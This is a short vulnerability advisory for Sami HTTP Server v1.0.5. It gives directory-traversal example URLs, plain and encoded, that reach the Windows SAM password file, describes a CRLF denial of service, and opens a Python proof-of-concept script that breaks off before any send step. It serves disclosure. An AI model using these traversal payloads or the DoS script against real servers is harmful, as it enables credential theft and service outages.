Summary
"Sami HTTP Server is an easy to set up webserver, for when you value simplicity and ease of use".

Multiple vulnerabilities in Sami HTTP Server allow an attacker to read arbitrary files on a vulnerable host and crash the server.

Credit:
The information has been provided by GSS IT.

Details
Vulnerable Systems:
* Sami HTTP Server v1.0.5.

Directory Traversal:
A remote user can obtain files on the system that are located outside of the web document directory.
Example:
http://[Target]/../../winnt/repair/sam
http://[Target]/%2e%2e/%2e%2e/winnt/repair/sam

Denial of Service:
The web server can be crashed by sending two Carriage Return (CR) and Line Feed (LF) [ \x0d\x0a ].

Proof of Concept Code:
#############################################
# GSS-IT Research And Security Labs #
#############################################
# #
# www.gssit.co.il #
# #
#############################################
# Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC #
#############################################
# Use This PoC For Educational Purposes Only #
#############################################

import sys
import socket

print("#############################################\n")
print("# Sami HTTP Web Server Ver 1.0.5 Denial Of Service PoC #\n")
print("#############################################\n\n")

if (len(sys.argv) < 3 ) :
print "Usage: %s <Target> <Port>" %sys.argv[0]
sys.exit(0)

server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
target = sys.argv[1]
port = int(sys.argv[2])